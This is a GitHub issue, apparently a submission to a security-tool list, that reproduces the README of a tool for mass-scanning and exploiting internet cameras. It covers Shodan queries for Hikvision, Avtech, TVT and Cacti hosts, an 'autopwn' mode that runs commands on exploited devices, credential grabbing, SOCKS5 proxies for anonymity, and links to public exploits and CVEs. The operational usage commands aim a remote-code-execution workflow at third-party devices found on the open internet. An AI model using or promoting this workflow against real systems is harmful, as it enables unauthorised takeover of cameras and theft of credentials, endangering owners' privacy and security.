[addtool] Camera Exploitation Tool


[homepage]
https://github.com/TasosY2K/camera-exploit-tool
[/homepage]

[tags]
camera, exploitation, scanner
[/tags]

[short_descr]
Automated exploit scanner for cameras on the internet.
[/short_descr]

[long_descr]
## Internet Camera Exploitation Tool

This is a tool meant to assist cyber security researchers on discovering outdated and vulnerable camera systems on the internet by utilizing shodan.io

I was able to discover thousands of vulnerable cameras using it
![image](https://user-images.githubusercontent.com/98208035/235867732-20fb5f8b-9ba1-4df2-8576-cc5f05abe2c0.png)
![image](https://user-images.githubusercontent.com/98208035/235867800-340cf4b2-bbd3-4f7a-aad4-902e4940c573.png)
![image](https://user-images.githubusercontent.com/98208035/235867824-14ee5357-40a9-4130-ba02-cb99b2f7da62.png)


## Vendors Affected

**[+]   Hikvision**

**[+]   Avtech**

**[+]   TVT**

**[+]   Cacti**

more to come...

## Features

- Fetching of hosts from shodan.io
- Check for vulnerable cameras
- Automatically run commands on exploited devices (Only Hikvision for now)
- Automatically grab camera credentials (Only for Avtech)
- Multi-threading for faster scanning
- Usage of Socks5 proxies for anonymity
- Storing results in Sqlite3 database
- Logging all actions in log files 

## Prerequisites

To use this tool you need to have the following:
- Shodan API key (Membership required for more than 1 page)
- Socks5 authenticated proxies

## Installation

```sh
git clone https://github.com/TasosY2K/camera-exploit-tool
pip install -r requirements.txt
python3 scanner.py --help
```

## Usage

##### Collect hosts in database

```sh
# Collect Hikvision hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Hikvision IP Camera"' --pages 1

# Collect Avtech hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'linux upnp avtech' --pages 1

# Collect TVT hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'product:"Cross Web Server"' --pages 1

# Collect Cacti hosts
python3 scanner.py --shodan --api-token <shodan_token> --query 'Login to Cacti' --pages 1
```

##### Check hosts for exploit

```sh
python3 scanner.py --check --proxy-file proxies.txt --threads 20
```

##### Automatically run command on exploited hosts

```sh
python3 scanner.py --autopwn --proxy-file proxies.txt --payload "id"
```

## Exploits Used
[https://www.exploit-db.com/exploits/40500](https://www.exploit-db.com/exploits/40500)

2021-36260 [https://www.exploit-db.com/exploits/50441](https://www.exploit-db.com/exploits/50441)

[https://github.com/k1p0d/h264_dvr_rce](https://github.com/k1p0d/h264_dvr_rce)

CVE-2022-46169 [https://github.com/sAsPeCt488/CVE-2022-46169](https://github.com/sAsPeCt488/CVE-2022-46169)

[/long_descr] 

[image]
![image](https://user-images.githubusercontent.com/98208035/235868212-b0403dd7-bccf-4ff5-8e50-69856dcb055c.png)

[/image]



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[addtool] Camera Exploitation Tool #1116

Internet Camera Exploitation Tool

Vendors Affected

Features

Prerequisites

Installation

Usage

Collect hosts in database

Check hosts for exploit

Automatically run command on exploited hosts

Exploits Used

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Uh oh!

[addtool] Camera Exploitation Tool #1116

Description

Internet Camera Exploitation Tool

Vendors Affected

Features

Prerequisites

Installation

Usage

Collect hosts in database

Check hosts for exploit

Automatically run command on exploited hosts

Exploits Used

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions